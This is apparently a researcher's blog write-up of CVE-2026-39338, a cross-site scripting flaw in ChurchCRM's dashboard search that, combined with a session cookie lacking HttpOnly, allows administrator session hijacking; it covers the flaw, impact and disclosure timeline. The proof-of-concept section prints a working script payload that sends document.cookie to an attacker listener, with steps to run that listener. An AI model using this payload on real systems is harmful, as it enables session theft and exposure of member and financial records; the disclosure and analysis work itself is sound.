CVE-2026-39338: Blind XSS to Full Admin Takeover in ChurchCRM

How a single unsanitized search parameter in ChurchCRM v7.0.5 led to complete administrator session hijacking — and why a missing HttpOnly flag turned a contained bug into total compromise.

Published on April 07, 2026 by Steven Amador

CVE XSS web-app-security

2 min READ

Summary

While doing independent research on ChurchCRM, an open-source church management platform, I found a Blind Cross-Site Scripting (XSS) vulnerability in the dashboard’s global search feature. On its own, that would have been a moderate finding. What made it serious was a second, unrelated misconfiguration: the application’s session cookie was missing the HttpOnly flag. Put those two issues together, and an attacker could fully hijack an Administrator’s session with nothing more than a crafted link.

This became CVE-2026-39338, affecting ChurchCRM versions ≤ 7.0.5, patched in 7.1.0. CVSS v4.0 score: 8.3 (High).

Where was it in the code?

The vulnerable parameter was searchTerm, accepted by the dashboard’s global search bar at: http://[TARGET]/churchcrm/v2/dashboard

The application reflected this input back into the page without applying any output encoding (htmlspecialchars()). CWE-79 — improper neutralization of input during web page generation.

The application did throw an HTTP 500 error, I suspect, due to a malformed input which also broke a downstream API call.

HttpOnly flag

Not setting the HttpOnly flag (CWE-1004): allowed for the session cookie to be read directly via document.cookie and sent via fetch to my listener.

Proof of Concept

Payload:

<script>fetch('http://192.168.112.128:8080/log?c='+document.cookie)</script>

Steps to reproduce:

  1. Stand up a listener on the attacker machine: python3 -m http.server 8080

  2. Search the script, inject the payload into the search bar. Payload:

  3. View your listener traffic in terminal and see the cookie sent in plain text.

Impact

With a hijacked admin session, an attacker could potentially:

  • Export the full membership database — names, addresses, contact info, family records.
  • View, modify, or delete financial and donation records.
  • Create new admin accounts for persistent access, surviving the original session’s expiration.
  • Pivot further if the CRM instance shares infrastructure with other services.

Disclosure Timeline

  • March 27–28, 2026 — Vulnerability identified during independent research.
  • Reported privately to the ChurchCRM maintainers through GitHub’s security advisory process.
  • April 7, 2026 — Advisory published, CVE-2026-39338 assigned, fix released in v7.1.0.

I followed a standard responsible disclosure approach throughout — no public details, no weaponization, full coordination with the maintainers before publicly disclosing.

Takeaways

Two small issues — missing output encoding and a missing cookie flag — combined into a full compromise chain. Neither one alone would have been nearly as severe. It’s a good reminder that defense-in-depth should be top of mind: HttpOnly exists specifically to contain damage when an XSS is possible.

Full technical advisory: GHSA-3ghg-qfqw-rcqf

Official CVE record: CVE-2026-39338